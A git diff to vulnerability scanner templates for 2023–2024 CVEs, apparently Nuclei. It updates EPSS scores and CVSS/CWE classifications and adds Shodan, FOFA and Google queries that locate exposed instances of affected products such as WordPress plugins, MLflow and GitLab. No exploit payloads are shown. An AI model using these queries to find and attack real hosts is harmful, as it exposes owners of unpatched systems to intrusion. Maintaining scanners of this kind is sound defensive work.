37f74e205f..bc43c29665 100644 --- a/http/cves/2023/CVE-2023-5003.yaml +++ b/http/cves/2023/CVE-2023-5003.yaml @@ -14,15 +14,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-5003 - epss-score: 0.00084 - epss-percentile: 0.35074 + epss-score: 0.00419 + epss-percentile: 0.7409 cpe: cpe:2.3:a:miniorange:active_directory_integration_\/_ldap_integration:*:*:*:*:*:wordpress:*:* metadata: + verified: true + max-request: 1 vendor: miniorange product: active_directory_integration_\/_ldap_integration framework: wordpress - verified: true - max-request: 1 tags: wpscan,exposure,csv,ldap,cve2023,wordpress,wp-plugin http: diff --git a/http/cves/2023/CVE-2023-50290.yaml b/http/cves/2023/CVE-2023-50290.yaml index 970e880864..e62cd38424 100644 --- a/http/cves/2023/CVE-2023-50290.yaml +++ b/http/cves/2023/CVE-2023-50290.yaml @@ -22,13 +22,15 @@ info: cve-id: CVE-2023-50290 cwe-id: CWE-200,NVD-CWE-noinfo epss-score: 0.05452 - epss-percentile: 0.92995 + epss-percentile: 0.93157 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: solr shodan-query: "title:\"Apache Solr\"" + fofa-query: title="solr admin" + google-query: intitle:"apache solr" tags: cve,cve2023,apache,solr,exposure http: diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml index 9c0ebc96d2..0a9a14c4a2 100644 --- a/http/cves/2023/CVE-2023-5074.yaml +++ b/http/cves/2023/CVE-2023-5074.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-5074 cwe-id: CWE-798 - epss-score: 0.01695 - epss-percentile: 0.87453 + epss-score: 0.01843 + epss-percentile: 0.88296 cpe: cpe:2.3:a:dlink:d-view_8:2.0.1.28:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-5089.yaml b/http/cves/2023/CVE-2023-5089.yaml index 1036b74c92..0e7d731d2a 100644 --- a/http/cves/2023/CVE-2023-5089.yaml +++ b/http/cves/2023/CVE-2023-5089.yaml @@ -15,8 +15,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-5089 - epss-score: 0.00306 - epss-percentile: 0.6923 + epss-score: 0.00291 + epss-percentile: 0.69035 cpe: cpe:2.3:a:wpmudev:defender_security:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,6 +24,8 @@ info: vendor: wpmudev product: defender_security framework: wordpress + shodan-query: http.html:/wp-content/plugins/defender-security/ + fofa-query: body=/wp-content/plugins/defender-security/ publicwww-query: "/wp-content/plugins/defender-security/" tags: cve,cve2023,wordpress,wpscan,wp-plugin,defender-security,redirect diff --git a/http/cves/2023/CVE-2023-50917.yaml b/http/cves/2023/CVE-2023-50917.yaml index 2d94b93d85..1fdec9b021 100644 --- a/http/cves/2023/CVE-2023-50917.yaml +++ b/http/cves/2023/CVE-2023-50917.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-50917 cwe-id: CWE-77 - epss-score: 0.71101 - epss-percentile: 0.97965 + epss-score: 0.70095 + epss-percentile: 0.98019 cpe: cpe:2.3:a:mjdm:majordomo:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-50968.yaml b/http/cves/2023/CVE-2023-50968.yaml index ac84dea108..154cbf4add 100644 --- a/http/cves/2023/CVE-2023-50968.yaml +++ b/http/cves/2023/CVE-2023-50968.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-50968 cwe-id: CWE-918,CWE-200 - epss-score: 0.32266 - epss-percentile: 0.96905 + epss-score: 0.23447 + epss-percentile: 0.96556 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-51467.yaml b/http/cves/2023/CVE-2023-51467.yaml index b8baaab188..3907840d23 100644 --- a/http/cves/2023/CVE-2023-51467.yaml +++ b/http/cves/2023/CVE-2023-51467.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-51467 cwe-id: CWE-918 - epss-score: 0.68495 - epss-percentile: 0.97894 + epss-score: 0.58267 + epss-percentile: 0.97731 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-52085.yaml b/http/cves/2023/CVE-2023-52085.yaml index b038059ace..8a3512d641 100644 --- a/http/cves/2023/CVE-2023-52085.yaml +++ b/http/cves/2023/CVE-2023-52085.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-52085 cwe-id: CWE-22 epss-score: 0.00256 - epss-percentile: 0.64798 + epss-percentile: 0.65415 cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:* metadata: max-request: 4 @@ -23,6 +23,7 @@ info: product: winter shodan-query: "title:\"Winter CMS\"" fofa-query: "title=\"Winter CMS\"" + google-query: intitle:"winter cms" tags: cve,cve2023,authenticated,lfi,wintercms http: diff --git a/http/cves/2023/CVE-2023-5244.yaml b/http/cves/2023/CVE-2023-5244.yaml index f3c8722b3c..19f3a9805d 100644 --- a/http/cves/2023/CVE-2023-5244.yaml +++ b/http/cves/2023/CVE-2023-5244.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-5244 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.2616 + epss-score: 0.00176 + epss-percentile: 0.54692 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,7 @@ info: vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve,cve2023,huntr,xss,microweber http: diff --git a/http/cves/2023/CVE-2023-5360.yaml b/http/cves/2023/CVE-2023-5360.yaml index 583aa0b3bf..9f2a231ddf 100644 --- a/http/cves/2023/CVE-2023-5360.yaml +++ b/http/cves/2023/CVE-2023-5360.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-5360 cwe-id: CWE-434 - epss-score: 0.96723 - epss-percentile: 0.99637 + epss-score: 0.96512 + epss-percentile: 0.99596 cpe: cpe:2.3:a:royal-elementor-addons:royal_elementor_addons:*:*:*:*:*:wordpress:*:* metadata: verified: "true" @@ -27,9 +27,10 @@ info: vendor: royal-elementor-addons product: royal_elementor_addons framework: wordpress + shodan-query: http.html:/plugins/royal-elementor-addons/ + fofa-query: body=/plugins/royal-elementor-addons/ publicwww-query: "/plugins/royal-elementor-addons/" tags: wpscan,packetstorm,cve,cve2023,rce,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive - variables: file: "{{to_lower(rand_text_alpha(5))}}" string: "CVE-2023-5360" diff --git a/http/cves/2023/CVE-2023-5375.yaml b/http/cves/2023/CVE-2023-5375.yaml index 7cb9ec08d1..9f508251d1 100644 --- a/http/cves/2023/CVE-2023-5375.yaml +++ b/http/cves/2023/CVE-2023-5375.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-5375 cwe-id: CWE-601 - epss-score: 0.00083 - epss-percentile: 0.339 + epss-score: 0.00092 + epss-percentile: 0.39191 cpe: cpe:2.3:a:mosparo:mosparo:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-5556.yaml b/http/cves/2023/CVE-2023-5556.yaml index 07dd43ff62..059474be63 100644 --- a/http/cves/2023/CVE-2023-5556.yaml +++ b/http/cves/2023/CVE-2023-5556.yaml @@ -18,13 +18,14 @@ info: cve-id: CVE-2023-5556 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26117 + epss-percentile: 0.27592 cpe: cpe:2.3:a:structurizr:on-premises_installation:*:*:*:*:*:*:*:* metadata: max-request: 5 vendor: structurizr product: on-premises_installation shodan-query: http.favicon.hash:1199592666 + fofa-query: icon_hash=1199592666 tags: cve,cve2023,xss,structurizr,oos,authenticated variables: str: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-5830.yaml b/http/cves/2023/CVE-2023-5830.yaml index 51fd449d81..7a1fd69f82 100644 --- a/http/cves/2023/CVE-2023-5830.yaml +++ b/http/cves/2023/CVE-2023-5830.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2023-5830 cwe-id: CWE-287 epss-score: 0.00427 - epss-percentile: 0.73911 + epss-percentile: 0.74333 cpe: cpe:2.3:a:documentlocator:document_locator:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: documentlocator product: document_locator shodan-query: 'title:"Document Locator - WebTools"' + fofa-query: title="document locator - webtools" + google-query: intitle:"document locator - webtools" tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools http: diff --git a/http/cves/2023/CVE-2023-5914.yaml b/http/cves/2023/CVE-2023-5914.yaml index 2dbeb41235..4ef598c820 100644 --- a/http/cves/2023/CVE-2023-5914.yaml +++ b/http/cves/2023/CVE-2023-5914.yaml @@ -17,13 +17,14 @@ info: cve-id: CVE-2023-5914 cwe-id: CWE-79 epss-score: 0.00095 - epss-percentile: 0.3876 + epss-percentile: 0.39942 cpe: cpe:2.3:a:cloud:citrix_storefront:*:*:*:*:ltsr:*:*:* metadata: max-request: 1 vendor: cloud product: citrix_storefront shodan-query: html:"/Citrix/StoreWeb" + fofa-query: body="/citrix/storeweb" tags: cve,cve2024,xss,citrix,storefront http: diff --git a/http/cves/2023/CVE-2023-5991.yaml b/http/cves/2023/CVE-2023-5991.yaml index da1a165a5d..5fd55b51f8 100644 --- a/http/cves/2023/CVE-2023-5991.yaml +++ b/http/cves/2023/CVE-2023-5991.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-5991 cwe-id: CWE-22 - epss-score: 0.00603 - epss-percentile: 0.78412 + epss-score: 0.17487 + epss-percentile: 0.96115 cpe: cpe:2.3:a:motopress:hotel_booking_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,6 +24,8 @@ info: vendor: motopress product: hotel_booking_lite framework: wordpress + shodan-query: http.html:/wp-content/plugins/motopress-hotel-booking + fofa-query: body=/wp-content/plugins/motopress-hotel-booking publicwww-query: "/wp-content/plugins/motopress-hotel-booking" tags: cve,cve2023,lfi,motopress-hotel-booking,wordpress,wp-plugin,wpscan,wp diff --git a/http/cves/2023/CVE-2023-6018.yaml b/http/cves/2023/CVE-2023-6018.yaml index 4d957bdc53..2a4d6687e3 100644 --- a/http/cves/2023/CVE-2023-6018.yaml +++ b/http/cves/2023/CVE-2023-6018.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-6018 cwe-id: CWE-78 epss-score: 0.86232 - epss-percentile: 0.98502 + epss-percentile: 0.98574 cpe: cpe:2.3:a:lfprojects:mlflow:-:*:*:*:*:*:*:* metadata: verified: true @@ -23,6 +23,8 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" + fofa-query: title="mlflow" + google-query: intitle:"mlflow" tags: cve,cve2023,mlflow,oss,rce,intrusive variables: model_name: "{{rand_text_alpha(6)}}" diff --git a/http/cves/2023/CVE-2023-6020.yaml b/http/cves/2023/CVE-2023-6020.yaml index d88f9a08ae..9951ee6eab 100644 --- a/http/cves/2023/CVE-2023-6020.yaml +++ b/http/cves/2023/CVE-2023-6020.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-6020 cwe-id: CWE-862 epss-score: 0.06351 - epss-percentile: 0.9349 + epss-percentile: 0.93636 cpe: cpe:2.3:a:ray_project:ray:-:*:*:*:*:*:*:* metadata: verified: true @@ -23,6 +23,7 @@ info: vendor: ray_project product: ray shodan-query: http.favicon.hash:463802404 + fofa-query: body="ray dashboard" tags: cve2023,cve,lfi,ray,oos,ray_project http: diff --git a/http/cves/2023/CVE-2023-6021.yaml b/http/cves/2023/CVE-2023-6021.yaml index 1ffb9b62e9..0323e7dc80 100644 --- a/http/cves/2023/CVE-2023-6021.yaml +++ b/http/cves/2023/CVE-2023-6021.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-6021 cwe-id: CWE-22,CWE-29 epss-score: 0.0038 - epss-percentile: 0.72442 + epss-percentile: 0.72895 cpe: cpe:2.3:a:ray_project:ray:-:*:*:*:*:*:*:* metadata: verified: true @@ -23,6 +23,7 @@ info: vendor: ray_project product: ray shodan-query: html:"Ray Dashboard" + fofa-query: body="ray dashboard" tags: cve,cve2023,lfi,ray,oos,ray_project http: diff --git a/http/cves/2023/CVE-2023-6023.yaml b/http/cves/2023/CVE-2023-6023.yaml index e9e4cb741d..d1cde882d8 100644 --- a/http/cves/2023/CVE-2023-6023.yaml +++ b/http/cves/2023/CVE-2023-6023.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-6023 cwe-id: CWE-22,CWE-29 epss-score: 0.003 - epss-percentile: 0.68895 + epss-percentile: 0.69472 cpe: cpe:2.3:a:vertaai:modeldb:-:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: vendor: vertaai product: modeldb shodan-query: http.favicon.hash:-2097033750 + fofa-query: icon_hash=-2097033750 + google-query: intitle:"verta ai" zoomeye-query: title:"Verta AI" tags: cve,cve2023,lfi,modeldb diff --git a/http/cves/2023/CVE-2023-6038.yaml b/http/cves/2023/CVE-2023-6038.yaml index 2b80f785df..d2d3ca90d1 100644 --- a/http/cves/2023/CVE-2023-6038.yaml +++ b/http/cves/2023/CVE-2023-6038.yaml @@ -14,9 +14,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-6038 - cwe-id: CWE-862,CWE-29 - epss-score: 0.05392 - epss-percentile: 0.92391 + cwe-id: CWE-862 + epss-score: 0.06351 + epss-percentile: 0.93636 cpe: cpe:2.3:a:h2o:h2o:-:*:*:*:*:*:*:* metadata: verified: true @@ -24,6 +24,8 @@ info: vendor: h2o product: h2o shodan-query: title:"H2O Flow" + fofa-query: title="h2o flow" + google-query: intitle:"h2o flow" tags: cve,cve2023,h2o-3,h2o,ml http: diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index 57281bd29f..7bf2365ff1 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -19,13 +19,15 @@ info: cve-id: CVE-2023-6063 cwe-id: CWE-89 epss-score: 0.02974 - epss-percentile: 0.9065 + epss-percentile: 0.90865 cpe: cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: wpfastestcache product: wp_fastest_cache framework: wordpress + shodan-query: http.html:/wp-content/plugins/wp-fastest-cache/ + fofa-query: body=/wp-content/plugins/wp-fastest-cache/ publicwww-query: /wp-content/plugins/wp-fastest-cache/ tags: cve,cve2023,wp-fastest-cache,wpscan,wordpress,wp-plugin flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-6065.yaml b/http/cves/2023/CVE-2023-6065.yaml index a5eee969f4..58107cd62a 100644 --- a/http/cves/2023/CVE-2023-6065.yaml +++ b/http/cves/2023/CVE-2023-6065.yaml @@ -15,8 +15,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-6065 - epss-score: 0.00046 - epss-percentile: 0.16199 + epss-score: 0.00146 + epss-percentile: 0.50461 cpe: cpe:2.3:a:quttera:quttera_web_malware_scanner:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-6114.yaml b/http/cves/2023/CVE-2023-6114.yaml index a6f9c783c2..3eb7868174 100644 --- a/http/cves/2023/CVE-2023-6114.yaml +++ b/http/cves/2023/CVE-2023-6114.yaml @@ -17,14 +17,15 @@ info: cvss-score: 7.5 cve-id: CVE-2023-6114 cwe-id: CWE-552 - epss-score: 0.00145 - epss-percentile: 0.50326 + epss-score: 0.01646 + epss-percentile: 0.87553 cpe: cpe:2.3:a:awesomemotive:duplicator:*:*:*:*:-:wordpress:*:* metadata: max-request: 2 - product: duplicator vendor: awesomemotive + product: duplicator framework: wordpress + google-query: inurl:"/wp-content/plugins/duplicator" tags: cve,cve2023,duplicator,duplicator-pro,lfi,wpscan,wordpress,wp-plugin,wp http: diff --git a/http/cves/2023/CVE-2023-6360.yaml b/http/cves/2023/CVE-2023-6360.yaml index e25f728e00..300106a47f 100644 --- a/http/cves/2023/CVE-2023-6360.yaml +++ b/http/cves/2023/CVE-2023-6360.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-6360 cwe-id: CWE-89 epss-score: 0.00832 - epss-percentile: 0.81644 + epss-percentile: 0.81991 cpe: cpe:2.3:a:joedolson:my_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-6379.yaml b/http/cves/2023/CVE-2023-6379.yaml index d12adc333b..99d03e0b53 100644 --- a/http/cves/2023/CVE-2023-6379.yaml +++ b/http/cves/2023/CVE-2023-6379.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-6379 cwe-id: CWE-79 - epss-score: 0.00113 - epss-percentile: 0.44636 + epss-score: 0.00075 + epss-percentile: 0.32047 cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: alkacon product: opencms shodan-query: title:"opencms" + fofa-query: title="opencms" + google-query: intitle:"opencms" tags: cve2023,cve,opencms,xss,alkacon http: diff --git a/http/cves/2023/CVE-2023-6380.yaml b/http/cves/2023/CVE-2023-6380.yaml index f2fcf4b42d..6f23bea096 100644 --- a/http/cves/2023/CVE-2023-6380.yaml +++ b/http/cves/2023/CVE-2023-6380.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-6380 cwe-id: CWE-601 epss-score: 0.01158 - epss-percentile: 0.83366 + epss-percentile: 0.84838 cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:* metadata: verified: true @@ -24,6 +24,8 @@ info: vendor: alkacon product: opencms shodan-query: "/opencms/" + fofa-query: title="opencms" + google-query: intitle:"opencms" tags: cve,cve2023,redirect,opencms http: diff --git a/http/cves/2023/CVE-2023-6389.yaml b/http/cves/2023/CVE-2023-6389.yaml index 74d9433cde..917e147152 100644 --- a/http/cves/2023/CVE-2023-6389.yaml +++ b/http/cves/2023/CVE-2023-6389.yaml @@ -22,8 +22,10 @@ info: max-request: 1 vendor: abhinavsingh product: wordpress_toolbar + shodan-query: http.html:/wp-content/plugins/wordpress-toolbar/ + fofa-query: body=/wp-content/plugins/wordpress-toolbar/ publicwww-query: "/wp-content/plugins/wordpress-toolbar/" - tags: cve,cve2023,wordpress,wp-plugin,wordpress-toolbar,wp,redirect + tags: wpscan,cve,cve2023,wordpress,wp-plugin,wordpress-toolbar,wp,redirect http: - method: GET diff --git a/http/cves/2023/CVE-2023-6553.yaml b/http/cves/2023/CVE-2023-6553.yaml index 400597e957..ebae9ddafd 100644 --- a/http/cves/2023/CVE-2023-6553.yaml +++ b/http/cves/2023/CVE-2023-6553.yaml @@ -24,9 +24,11 @@ info: vendor: backupbliss product: backup_migration framework: wordpress + shodan-query: http.html:/wp-content/plugins/backup-backup/ + fofa-query: body=/wp-content/plugins/backup-backup/ publicwww-query: /wp-content/plugins/backup-backup/ google-query: inurl:"/wp-content/plugins/backup-backup/" - tags: cve,cve2023,wp-plugin,rce,unauth,wordpress,wp + tags: packetstorm,cve,cve2023,wp-plugin,rce,unauth,wordpress,wp flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-6567.yaml b/http/cves/2023/CVE-2023-6567.yaml index a6e2943d61..5a9ad442ae 100644 --- a/http/cves/2023/CVE-2023-6567.yaml +++ b/http/cves/2023/CVE-2023-6567.yaml @@ -27,6 +27,8 @@ info: vendor: thimpress product: learnpress framework: wordpress + shodan-query: http.html:/wp-content/plugins/learnpress + fofa-query: body=/wp-content/plugins/learnpress publicwww-query: "/wp-content/plugins/learnpress" tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli diff --git a/http/cves/2023/CVE-2023-6623.yaml b/http/cves/2023/CVE-2023-6623.yaml index f6dabde295..f8a50523ce 100644 --- a/http/cves/2023/CVE-2023-6623.yaml +++ b/http/cves/2023/CVE-2023-6623.yaml @@ -28,6 +28,8 @@ info: vendor: wpdeveloper product: essential_blocks framework: wordpress + shodan-query: http.html:/wp-content/plugins/essential-blocks/ + fofa-query: body=/wp-content/plugins/essential-blocks/ publicwww-query: "/wp-content/plugins/essential-blocks/" tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi diff --git a/http/cves/2023/CVE-2023-6634.yaml b/http/cves/2023/CVE-2023-6634.yaml index bcfcddafca..3ca99e2e70 100644 --- a/http/cves/2023/CVE-2023-6634.yaml +++ b/http/cves/2023/CVE-2023-6634.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-6634 cwe-id: CWE-77 - epss-score: 0.16476 - epss-percentile: 0.95874 + epss-score: 0.18881 + epss-percentile: 0.9624 cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: vendor: thimpress product: learnpress framework: wordpress + shodan-query: http.html:/wp-content/plugins/learnpress + fofa-query: body=/wp-content/plugins/learnpress publicwww-query: "/wp-content/plugins/learnpress" tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,learnpress,rce,intrusive variables: diff --git a/http/cves/2023/CVE-2023-6831.yaml b/http/cves/2023/CVE-2023-6831.yaml index c20de4ecb6..c61efb18c2 100644 --- a/http/cves/2023/CVE-2023-6831.yaml +++ b/http/cves/2023/CVE-2023-6831.yaml @@ -16,9 +16,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H cvss-score: 8.1 cve-id: CVE-2023-6831 - cwe-id: CWE-22 - epss-score: 0.00046 - epss-percentile: 0.12693 + cwe-id: CWE-22,CWE-29 + epss-score: 0.00207 + epss-percentile: 0.58698 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: vendor: lfprojects product: mlflow shodan-query: "http.title:\"mlflow\"" + fofa-query: title="mlflow" + google-query: intitle:"mlflow" tags: cve,cve2023,mlflow,pathtraversal,lfprojects,intrusive http: diff --git a/http/cves/2023/CVE-2023-6875.yaml b/http/cves/2023/CVE-2023-6875.yaml index 5bfecacd98..112b394224 100644 --- a/http/cves/2023/CVE-2023-6875.yaml +++ b/http/cves/2023/CVE-2023-6875.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-6875 cwe-id: CWE-862 - epss-score: 0.04263 - epss-percentile: 0.92089 + epss-score: 0.05153 + epss-percentile: 0.92961 cpe: cpe:2.3:a:wpexperts:post_smtp_mailer:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: vendor: wpexperts product: post_smtp_mailer framework: wordpress + shodan-query: http.html:/wp-content/plugins/post-smtp + fofa-query: body=/wp-content/plugins/post-smtp publicwww-query: "/wp-content/plugins/post-smtp" tags: cve,cve2023,wp,wp-plugin,wordpress,smtp,mailer,auth-bypass variables: diff --git a/http/cves/2023/CVE-2023-6895.yaml b/http/cves/2023/CVE-2023-6895.yaml index 034e26941e..d235fb2d48 100644 --- a/http/cves/2023/CVE-2023-6895.yaml +++ b/http/cves/2023/CVE-2023-6895.yaml @@ -9,19 +9,23 @@ info: reference: - https://vuldb.com/?ctiid.248254 - https://vuldb.com/?id.248254 + - https://github.com/tanjiti/sec_profile + - https://github.com/wy876/POC + - https://github.com/xingchennb/POC- classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-6895 cwe-id: CWE-78 - epss-score: 0.0008 - epss-percentile: 0.33389 + epss-score: 0.89707 + epss-percentile: 0.9876 cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: hikvision product: intercom_broadcast_system + shodan-query: http.favicon.hash:"-1830859634" fofa-query: "icon_hash=\"-1830859634\"" tags: cve,cve2023,hikvision,rce diff --git a/http/cves/2023/CVE-2023-6909.yaml b/http/cves/2023/CVE-2023-6909.yaml index fe4e77c554..0a9d5b0090 100644 --- a/http/cves/2023/CVE-2023-6909.yaml +++ b/http/cves/2023/CVE-2023-6909.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-6909 cwe-id: CWE-29 - epss-score: 0.00409 - epss-percentile: 0.73387 + epss-score: 0.00494 + epss-percentile: 0.76167 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: lfprojects product: mlflow shodan-query: "http.title:\"mlflow\"" + fofa-query: title="mlflow" + google-query: intitle:"mlflow" tags: cve,cve2023,mlflow,lfi,intrusive http: diff --git a/http/cves/2023/CVE-2023-6977.yaml b/http/cves/2023/CVE-2023-6977.yaml index 2eb799cbbc..ad82399438 100644 --- a/http/cves/2023/CVE-2023-6977.yaml +++ b/http/cves/2023/CVE-2023-6977.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-6977 cwe-id: CWE-29 - epss-score: 0.00409 - epss-percentile: 0.73387 + epss-score: 0.00494 + epss-percentile: 0.76167 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" + fofa-query: title="mlflow" + google-query: intitle:"mlflow" tags: cve,cve2023,mlflow,oss,lfi,intrusive,lfprojects http: diff --git a/http/cves/2023/CVE-2023-6989.yaml b/http/cves/2023/CVE-2023-6989.yaml index 9551426c51..802578849e 100644 --- a/http/cves/2023/CVE-2023-6989.yaml +++ b/http/cves/2023/CVE-2023-6989.yaml @@ -9,13 +9,14 @@ info: reference: - https://wpscan.com/vulnerability/a485aee7-39a0-418c-9699-9afc53e28f55/ - https://nvd.nist.gov/vuln/detail/CVE-2023-6989 + - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-6989 cwe-id: CWE-22 - epss-score: 0.00282 - epss-percentile: 0.68187 + epss-score: 0.11562 + epss-percentile: 0.95251 cpe: cpe:2.3:a:getshieldsecurity:shield_security:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -23,8 +24,10 @@ info: vendor: getshieldsecurity product: shield_security framework: wordpress + shodan-query: http.html:/wp-content/plugins/wp-simple-firewall + fofa-query: body=/wp-content/plugins/wp-simple-firewall publicwww-query: "/wp-content/plugins/wp-simple-firewall" - tags: cve,cve2023,wp,wordpress,wp-plugin,lfi,shield-security + tags: wpscan,cve,cve2023,wp,wordpress,wp-plugin,lfi,shield-security http: - raw: diff --git a/http/cves/2023/CVE-2023-7028.yaml b/http/cves/2023/CVE-2023-7028.yaml index 221abe6746..80f92e14eb 100644 --- a/http/cves/2023/CVE-2023-7028.yaml +++ b/http/cves/2023/CVE-2023-7028.yaml @@ -3,7 +3,7 @@ id: CVE-2023-7028 info: name: GitLab - Account Takeover via Password Reset author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch - severity: critical + severity: high description: | An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address. reference: @@ -11,19 +11,24 @@ info: - https://x.com/rwincey/status/1745659710089437368?s=20 - https://gitlab.com/gitlab-org/gitlab/-/issues/436084 - https://hackerone.com/reports/2293343 + - https://github.com/V1lu0/CVE-2023-7028 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N - cvss-score: 10 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2023-7028 - cwe-id: CWE-284 + cwe-id: CWE-640,CWE-284 + epss-score: 0.95952 + epss-percentile: 0.99464 + cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: verified: true max-request: 6 vendor: gitlab product: gitlab shodan-query: title:"Gitlab" - tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive - + fofa-query: title="gitlab" + google-query: intitle:"gitlab" + tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive,kev flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml index 0d421f8fc1..07766fd74e 100644 --- a/http/cves/2024/CVE-2024-0195.yaml +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -10,13 +10,15 @@ info: - https://github.com/Shelter1234/VulneraLab/blob/main/SpiderFlow/CVE-2024-0195/README.zh-cn.md - https://vuldb.com/?id.249510 - 